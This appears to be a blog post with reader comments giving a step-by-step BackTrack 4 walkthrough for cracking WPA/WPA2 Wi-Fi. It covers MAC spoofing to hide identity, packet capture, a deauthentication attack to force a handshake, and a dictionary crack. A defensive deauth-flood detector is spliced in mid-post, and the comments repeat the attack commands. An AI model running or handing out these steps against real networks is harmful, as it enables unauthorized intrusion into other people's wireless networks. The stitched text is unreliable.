Crack WPA/WPA2 with BT4

Please be ethical with knowledge

Cracking wireless is fun. It's like a slap in the face to everyone who thinks wireless is safe. Hiding your SSID, MAC filtering, and other tweaks will not keep you safe.

# ifconfig -a

Find your wireless interface (if) in the output.

# airmon-ng stop <wireless if>

# ifconfig <wireless if> down

# macchanger -m <mac to use, in xx:xx:xx:xx:xx:xx form> <wireless if>

We change our MAC to hide our identity, and also if we want to bypass MAC filtering.

# airodump-ng <wireless if>

This will discover APs in the area. It's a really neat, powerful tool; play with it a little.

# airodump-ng --channel <channel> -w <file> --bssid <AP MAC in the form XX:XX:XX:XX:XX:XX> <wireless if>

This will capture packets for a specific BSSID on a specific channel to the file prefix you specify.

In a new shell…

# aireplay-ng -0 10 -a <AP MAC> -c <client MAC> <wireless if>

Wait for the ACK packets. This will only work if there are active clients on the AP.

Now crack the dump with a dictionary (wordlist) attack:

# aircrack-ng -w <dict file> <file>-01.cap

If you need a dictionary file, there is an existing one in /pentest/wireless/cowpatty/dict
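Added example from the defender's side, not part of the original post: the deauthentication burst that the aireplay-ng step sends is loud on the air, and a wireless IDS can flag it by counting deauth/disassoc frames per BSSID in a short sliding window. The frame records, MAC addresses, window and threshold below are constructed for the demonstration; feeding it frames parsed from a real monitor-mode capture (with scapy or tshark) is assumed.

```python
from collections import defaultdict, deque

# 802.11 frame type/subtype values of interest (type 0 = management frame)
MGMT, DEAUTH, DISASSOC, BEACON = 0, 12, 10, 8
WINDOW_SECONDS = 2.0   # sliding-window length
THRESHOLD = 5          # more deauth/disassoc frames than this per BSSID per window = flood

# Constructed addresses for the sample, not real devices
AP = "00:11:22:33:44:55"        # the BSSID under attack
CLIENT = "aa:bb:cc:dd:ee:01"    # an associated client
OTHER_AP = "66:77:88:99:aa:bb"  # a neighbouring BSSID seeing only normal traffic

def _flood(start, count, ap, client):
    """Constructed burst shaped like a deauth flood: frames spoofed as AP->client
    and client->AP about 10 ms apart. Sample data only, not a capture."""
    return [(start + i * 0.01, MGMT, DEAUTH,
             ap if i % 2 == 0 else client, client if i % 2 == 0 else ap, ap)
            for i in range(count)]

# Records are (timestamp_s, frame_type, frame_subtype, src, dst, bssid), the
# fields a parser such as scapy or tshark would give you. Constructed sample.
SAMPLE_FRAMES = [
    (0.0, MGMT, BEACON, AP, "ff:ff:ff:ff:ff:ff", AP),
    (0.1, MGMT, BEACON, OTHER_AP, "ff:ff:ff:ff:ff:ff", OTHER_AP),
    (1.0, MGMT, DEAUTH, CLIENT, AP, AP),                # a client leaving normally
    (1.2, 2, 0, CLIENT, OTHER_AP, OTHER_AP),            # an ordinary data frame
    (30.0, MGMT, DISASSOC, CLIENT, OTHER_AP, OTHER_AP),
] + _flood(45.0, 20, AP, CLIENT)

def detect_deauth_floods(frames, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Count deauth/disassoc frames per BSSID in a sliding time window.
    Returns one (bssid, window_start_ts, count) per BSSID, emitted the first
    time its count within `window` seconds exceeds `threshold`."""
    recent = defaultdict(deque)
    alerted, alerts = set(), []
    for ts, ftype, subtype, _src, _dst, bssid in sorted(frames, key=lambda f: f[0]):
        if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:  # evict frames older than the window
            q.popleft()
        if len(q) > threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append((bssid, q[0], len(q)))
    return alerts

if __name__ == "__main__":
    for bssid, start, n in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"deauth flood on {bssid}: {n} frames within {WINDOW_SECONDS}s from t={start:.2f}")
```

Detection is the fallback; where the AP and clients support management frame protection (802.11w), forged deauthentication frames are rejected outright and the handshake cannot be forced this way.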

8 Replies to “Crack WPA/WPA2 with BT4”

  1. @tomas
    Duh, you noob. If you want brute force then you need to try WEP; this is WPA and WPA2. Do some research before looking like an idiot.
    At least Carl had something useful to add.

  2. I wonder how can you crack a WPA key without getting a handshake from the connected clients... Is it really possible? ;)

  3. Ok, after running airmon-ng, airodump-ng and getting a handshake, I save the file and call it "myhomeWPA-01.cap". How do I save this file onto my USB thumb drive if I am running BT4 from a live CD or a live USB drive? I want to save the file and open it later using Windows, so how do I do that? It seems that whatever is written on the live CD is not saved when I log off and reboot it again; the file is gone! I cannot find it. Where did the file go, since I issued a write command to write to a file? Any ideas?

  4. This is wep!!!! you need a handshake to start a wpa crack! and a dictionary with the password in it to actually succeed with the cracking process.... there are other ways to crack ap if you're already online with hydra..... THIS IS WEP!!! I have done this many times, enough to have remembered the process!!!! and can tell you it is wep.... To capture a handshake is aireplay-ng -0 5 -a insert bssid -c insert station id then your card in monitor mode (mon0)!!!! This after of course you start the capturing process! airodump-ng -c insert channel -w name of capture file --bssid insert bssid card in monitor mode (mon0)
